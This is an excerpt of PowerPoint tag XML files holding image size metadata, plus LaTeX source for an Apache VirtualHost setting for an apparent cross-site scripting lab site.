<p:tagLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="ORIGINALHEIGHT" val="4.090909"/>
  <p:tag name="ORIGINALWIDTH" val="2.954545"/>
  <p:tag name="EMFCHILD" val="True"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag125.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="ORIGINALHEIGHT" val="4.090909"/>
  <p:tag name="ORIGINALWIDTH" val="3.068182"/>
  <p:tag name="EMFCHILD" val="True"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag126.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="ORIGINALHEIGHT" val="4.090909"/>
  <p:tag name="ORIGINALWIDTH" val="3.125018"/>
  <p:tag name="EMFCHILD" val="True"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag127.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="ORIGINALHEIGHT" val="5.625018"/>
  <p:tag name="ORIGINALWIDTH" val="3.693199"/>
  <p:tag name="EMFCHILD" val="True"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag128.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="ORIGINALHEIGHT" val="5.625018"/>
  <p:tag name="ORIGINALWIDTH" val="2.840909"/>
  <p:tag name="EMFCHILD" val="True"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag129.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="ORIGINALHEIGHT" val="4.090909"/>
  <p:tag name="ORIGINALWIDTH" val="3.125018"/>
  <p:tag name="EMFCHILD" val="True"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag13.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="ORIGINALHEIGHT" val="3.522727"/>
  <p:tag name="ORIGINALWIDTH" val="2.954545"/>
  <p:tag name="EMFCHILD" val="True"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag130.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="ORIGINALHEIGHT" val="7.159091"/>
  <p:tag name="ORIGINALWIDTH" val="2.045455"/>
  <p:tag name="EMFCHILD" val="True"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag131.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="ORIGINALHEIGHT" val="5.284109"/>
  <p:tag name="ORIGINALWIDTH" val="1.136364"/>
  <p:tag name="EMFCHILD" val="True"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag132.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="ORIGINALHEIGHT" val="4.602291"/>
  <p:tag name="ORIGINALWIDTH" val="3.125018"/>
  <p:tag name="EMFCHILD" val="True"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag133.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="ORIGINALHEIGHT" val="7.159091"/>
  <p:tag name="ORIGINALWIDTH" val="3.068182"/>
  <p:tag name="EMFCHILD" val="True"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag134.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="ORIGINALHEIGHT" val="4.090909"/>
  <p:tag name="ORIGINALWIDTH" val="2.954545"/>
  <p:tag name="EMFCHILD" val="True"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag135.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="ORIGINALHEIGHT" val="4.090909"/>
  <p:tag name="ORIGINALWIDTH" val="2.954545"/>
  <p:tag name="EMFCHILD" val="True"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag136.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="ORIGINALHEIGHT" val="4.034109"/>
  <p:tag name="ORIGINALWIDTH" val="3.465927"/>
  <p:tag name="EMFCHILD" val="True"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag137.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="ORIGINALHEIGHT" val="5.625018"/>
  <p:tag name="ORIGINALWIDTH" val="2.840909"/>
  <p:tag name="EMFCHILD" val="True"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag138.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="ORIGINALHEIGHT" val="6.136364"/>
  <p:tag name="ORIGINALWIDTH" val="3.636364"/>
  <p:tag name="EMFCHILD" val="True"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag139.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="ORIGINALHEIGHT" val="5.113636"/>
  <p:tag name="ORIGINALWIDTH" val="3.181818"/>
  <p:tag name="EMFCHILD" val="True"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag14.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="ORIGINALHEIGHT" val="3.465927"/>
  <p:tag name="ORIGINALWIDTH" val="3.75"/>
  <p:tag name="EMFCHILD" val="True"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag140.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="ORIGINALHEIGHT" val="4.602291"/>
  <p:tag name="ORIGINALWIDTH" val="3.125018"/>
  <p:tag name="EMFCHILD" val="True"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag141.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="ORIGINALHEIGHT" val="33.57956"/>
  <p:tag name="ORIGINALWIDTH" val="150.0568"/>
  <p:tag name="LATEXADDIN" val="\documentclass{article}&#10;\usepackage{amsmath}&#10;\usepackage{upquote}&#10;\usepackage{alltt}&#10;\pagestyle{empty}&#10;\begin{document}&#10;&#10;\begin{alltt}&#10;&lt;VirtualHost *:80&gt;&#10;        ServerName www.XSSLabElgg.com&#10;        DocumentRoot /var/www/XSS/elgg&#10;&lt;/VirtualHost&gt;&#10;\end{alltt}&#10;&#10;&#10;\end{document}"/>
  <p:tag name="IGUANATEXSIZE" val="22"/>
  <p:tag name="IGUANATEXCURSOR" val="244"/>
  <p:tag name="TRANSPARENCY" val="True"/>
  <p:tag name="FILENAME" val=""/>
  <p:tag name="LATEXENGINEID" val="0"/>
  <p:tag name="TEMPFOLDER" val="C:\Temp\"/>
  <p:tag name="LATEXFORMHEIGHT" val="312"/>
  <p:tag name="LATEXFORMWIDTH" val="384"/>
  <p:tag name="LATEXFORMWRAP" val="True"/>
  <p:tag name="BITMAPVECTOR" val="1"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag142.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="ORIGINALHEIGHT" val="3.863636"/>
  <p:tag name="ORIGINALWIDTH" val="3.125018"/>
  <p:tag name="LATEXADDIN" val="\documentclass{article}&#10;\usepackage{amsmath}&#10;\usepackage{upquote}&#10;\usepackage{alltt}&#10;\pagestyle{empty}&#10;\begin{document}&#10;&#10;\begin{alltt}&#10;&lt;VirtualHost *:80&gt;&#10;        ServerName www.XSSLabElgg.com&#10;        DocumentRoot /var/www/XSS/elgg&#10;&lt;/VirtualHost&gt;&#10;\end{alltt}&#10;&#10;&#10;\end{document}"/>
  <p:tag name="IGUANATEXSIZE" val="22"/>
  <p:tag name="IGUANATEXCURSOR" val="244"/>
  <p:tag name="TRANSPARENCY" val="True"/>
  <p:tag name="FILENAME" val=""/>
  <p:tag name="LATEXENGINEID" val="0"/>
  <p:tag name="TEMPFOLDER" val="C:\Temp\"/>
  <p:tag name="LATEXFORMHEIGHT" val="312"/>
  <p:tag name="LATEXFORMWIDTH" val="384"/>
  <p:tag name="LATEXFORMWRAP" val="True"/>
  <p:tag name="BITMAPVECTOR" val="1"/>
  <p:tag name="EMFCHILD" val="True"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag143.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="ORIGINALHEIGHT" val="4.829563"/>
  <p:tag name="ORIGINALWIDTH" val="3.693199"/>
  <p:tag name="EMFCHILD" val="True"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag144.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="ORIGINALHEIGHT" val="4.772727"/>
  <p:tag name="ORIGINALWIDTH" val="2.840909"/>
  <p:tag name="EMFCHILD" val="True"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag145.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="ORIGINALHEIGHT" val="3.409091"/>
  <p:tag name="ORIGINALWIDTH" val="3.409091"/>
  <p:tag name="EMFCHILD" val="True"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag146.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="ORIGINALHEIGHT" val="4.375018"/>
  <p:tag name="ORIGINALWIDTH" val="3.181818"/>
  <p:tag name="EMFCHILD" val="True"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag147.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="ORIGINALHEIGHT" val="3.409091"/>
  <p:tag name="ORIGINALWIDTH" val="3.75"/>
  <p:tag name="EMFCHILD" val="True"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag148.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="ORIGINALHEIGHT" val="3.465927"/>
  <p:tag name="ORIGINALWIDTH" val="3.579563"/>
  <p:tag name="EMFCHILD" val="True"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag149.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="ORIGINALHEIGHT" val="4.772727"/>
  <p:tag name="ORIGINALWIDTH" val="3.125018"/>
  <p:tag name="EMFCHILD" val="True"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag15.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="ORIGINALHEIGHT" val="3.409091"/>
  <p:tag name="ORIGINALWIDTH" val="3.863636"/>
  <p:tag name="EMFCHILD" val="True"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag150.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="ORIGINALHEIGHT" val="4.772727"/>
  <p:tag name="ORIGINALWIDTH" val="3.636364"/>
  <p:tag name="EMFCHILD" val="True"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag151.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="ORIGINALHEIGHT" val="3.465927"/>
  <p:tag name="ORIGINALWIDTH" val="3.068182"/>
  <p:tag name="EMFCHILD" val="True"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag152.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="ORIGINALHEIGHT" val="3.465927"/>
  <p:tag name="ORIGINALWIDTH" val="2.897745"/>
  <p:tag name="EMFCHILD" val="True"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag153.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="ORIGINALHEIGHT" val="4.375018"/>
  <p:tag name="ORIGINALWIDTH" val="3.181818"/>
  <p:tag name="EMFCHILD" val="True"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag154.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="ORIGINALHEIGHT" val="3.352291"/>
  <p:tag name="ORIGINALWIDTH" val="2.954545"/>
  <p:tag name="EMFCHILD" val="True"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag155.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="ORIGINALHEIGHT" val="3.352291"/>
  <p:tag name="ORIGINALWIDTH" val="0.9090909"/>
  <p:tag name="EMFCHILD" val="True"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag156.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="ORIGINALHEIGHT" val="4.9432"/>
  <p:tag name="ORIGINALWIDTH" val="3.352291"/>
  <p:tag name="EMFCHILD" val="True"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag157.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="ORIGINALHEIGHT" val="4.9432"/>
  <p:tag name="ORIGINALWIDTH" val="3.181818"/>
  <p:tag name="EMFCHILD" val="True"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag158.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="ORIGINALHEIGHT" val="3.863636"/>
  <p:tag name="ORIGINALWIDTH" val="3.068182"/>
  <p:tag name="EMFCHILD" val="True"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag159.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="ORIGINALHEIGHT" val="5"/>
  <p:tag name="ORIGINALWIDTH" val="3.181818"/>
  <p:tag name="EMFCHILD" val="True"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag16.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="ORIGINALHEIGHT" val="3.522727"/>
  <p:tag name="ORIGINALWIDTH" val="3.068182"/>
  <p:tag name="EMFCHILD" val="True"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag160.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="ORIGINALHEIGHT" val="3.465927"/>
  <p:tag name="ORIGINALWIDTH" val="3.125018"/>
  <p:tag name="EMFCHILD" val="True"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag161.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="ORIGINALHEIGHT" val="3.409091"/>
  <p:tag name="ORIGINALWIDTH" val="3.465927"/>
  <p:tag name="EMFCHILD" val="True"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag162.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="ORIGINALHEIGHT" val="3.352291"/>
  <p:tag name="ORIGINALWIDTH" val="3.579563"/>
  <p:tag name="EMFCHILD" val="True"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag163.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="ORIGINALHEIGHT" val="3.465927"/>
  <p:tag name="ORIGINALWIDTH" val="3.068182"/>
  <p:tag name="EMFCHILD" val="True"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag164.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="ORIGINALHEIGHT" val="3.409091"/>
  <p:tag name="ORIGINALWIDTH" val="3.465927"/>
  <p:tag name="EMFCHILD" val="True"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag165.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="ORIGINALHEIGHT" val="4.772727"/>
  <p:tag name="ORIGINALWIDTH" val="3.522727"/>
  <p:tag name="EMFCHILD" val="True"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag166.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="ORIGINALHEIGHT" val="3.465927"/>
  <p:tag name="ORIGINALWIDTH" val="3.522727"/>
  <p:tag name="EMFCHILD" val="True"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag167.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="ORIGINALHEIGHT" val="3.409091"/>
  <p:tag name="ORIGINALWIDTH" val="3.920472"/>
  <p:tag name="EMFCHILD" val="True"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag168.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="ORIGINALHEIGHT" val="3.465927"/>
  <p:tag name="ORIGINALWIDTH" val="3.068182"/>
  <p:tag name="EMFCHILD" val="True"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag169.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="ORIGINALHEIGHT" val="3.352291"/>
  <p:tag name="ORIGINALWIDTH" val="3.693199"/>
  <p:tag name="EMFCHILD" val="True"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag17.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="ORIGINALHEIGHT" val="3.409091"/>
  <p:tag name="ORIGINALWIDTH" val="3.75"/>
  <p:tag name="EMFCHILD" val="True"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag170.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="ORIGINALHEIGHT" val="3.352291"/>
  <p:tag name="ORIGINALWIDTH" val="3.693199"/>
  <p:tag name="EMFCHILD" val="True"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag171.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="ORIGINALHEIGHT" val="3.352291"/>
  <p:tag name="ORIGINALWIDTH" val="3.75"/>
  <p:tag name="EMFCHILD" val="True"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag172.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="ORIGINALHEIGHT" val="0.9659269"/>
  <p:tag name="ORIGINALWIDTH" val="0.9090909"/>
  <p:tag name="EMFCHILD" val="True"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag173.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="ORIGINALHEIGHT" val="4.772727"/>
  <p:tag name="ORIGINALWIDTH" val="3.579563"/>
  <p:tag name="EMFCHILD" val="True"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag174.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="ORIGINALHEIGHT" val="5"/>
  <p:tag name="ORIGINALWIDTH" val="3.181818"/>
  <p:tag name="EMFCHILD" val="True"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag175.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="ORIGINALHEIGHT" val="5"/>
  <p:tag name="ORIGINALWIDTH" val="3.181818"/>
  <p:tag name="EMFCHILD" val="True"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag176.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="ORIGINALHEIGHT" val="4.772727"/>
  <p:tag name="ORIGINALWIDTH" val="3.465927"/>
  <p:tag name="EMFCHILD" val="True"/>
